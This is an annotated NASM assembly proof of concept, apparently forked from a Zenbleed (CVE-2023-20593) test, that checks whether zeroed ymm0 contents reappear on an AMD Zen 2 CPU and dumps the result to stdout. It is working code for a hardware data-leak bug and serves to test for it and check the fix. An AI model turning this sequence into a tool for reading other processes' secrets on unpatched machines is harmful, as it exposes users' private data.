zenymmasm.asm
; zenymmasm.asm -- standalone Linux x86-64 program (NASM, Intel syntax,
; raw syscalls, no libc).  Build/run: nasm -felf64, ld, run, pipe stdout
; through xxd.
;
; NOTE(review): the sequence below (load a secret into ymm0, zero it with
; vpxor, context-switch, then touch xmm0 with a legacy-SSE scalar compare)
; looks like a Zen 2 "Zenbleed" (CVE-2023-20593) vector-register-file leak
; test -- confirm against the upstream google/security-research repository
; this file was forked from.
;
; Expected output on a CPU that is not affected (or runs fixed microcode):
; 32 zero bytes.  If stale register-file contents reappear after the vpxor,
; the bytes spell out the original secret pattern instead.
;
; The exact instruction order and the syscalls between the steps ARE the
; experiment: do not reorder, hoist or "clean up" this sequence without
; re-validating the result on the target hardware.
BITS 64
global _start
; Linux x86-64 syscall numbers.  Convention: rax = number, args in
; rdi/rsi/rdx, result in rax; the kernel clobbers rcx and r11 (unused here).
%define SYS_sched_yield 0x18
%define SYS_write 0x01
%define SYS_exit 0x3c
section .data
align 32
; 32-byte marker loaded into ymm0.  NASM zero-pads 'SECRET' to a qword, so
; this is "SECRET\0\0" repeated four times -- easy to spot in a hex dump.
secret: times 4 dq 'SECRET'
align 32
; Scratch buffer ymm0 is stored into before write(2).  Kept in the writable
; .data section and 32-byte aligned to match the vector width.
regstate: dq 0,0,0,0
align 32
; Memory operand for the ucomiss below: bit pattern 0x00000001, which read
; as a single-precision float is a denormal.  Presumably chosen on purpose;
; confirm with the upstream author before changing the value.
space: dd 1
section .text
_start:
; Step 1: put a known, recognisable value into all 256 bits of ymm0.
vmovdqu ymm0, [rel secret]
; sched_yield(2) is used purely to force a context switch between steps
; (presumably so the kernel saves/restores the vector state -- not
; verifiable from this file).
mov rax, SYS_sched_yield
syscall
; Step 2: architecturally clear ymm0.  From here on, every read of ymm0
; should observe 32 zero bytes.
vpxor ymm0, ymm0, ymm0
; Force another context switch while ymm0 is (supposedly) zero.
mov rax, SYS_sched_yield
syscall
; Step 3: a legacy-SSE scalar compare that reads xmm0 (the low 128 bits of
; ymm0) against memory.  ucomiss only writes flags; it must not change
; ymm0 architecturally.  The upstream note reports that this sequence
; nevertheless "rolls" ymm0 back to its pre-vpxor contents -- that
; anomaly is what the program demonstrates.
ucomiss xmm0, dword [rel space]
mov rax, SYS_sched_yield
syscall
; Step 4: capture whatever ymm0 now holds and dump it to stdout as 32 raw
; bytes.  Any non-zero byte here is the leak signal.
vmovdqu [rel regstate], ymm0
; write(1, regstate, 32).  The return value is deliberately not checked: a
; short write or error would silently truncate the evidence, which is
; acceptable for a one-shot PoC but not for tooling that parses this output.
mov rax, SYS_write
mov rdi, 1
lea rsi, [rel regstate]
mov rdx, 32
syscall
; exit(0) -- does not return.
mov rax, SYS_exit
mov rdi, 0
syscall
; Trap if exit somehow returns; unreachable in practice.
int3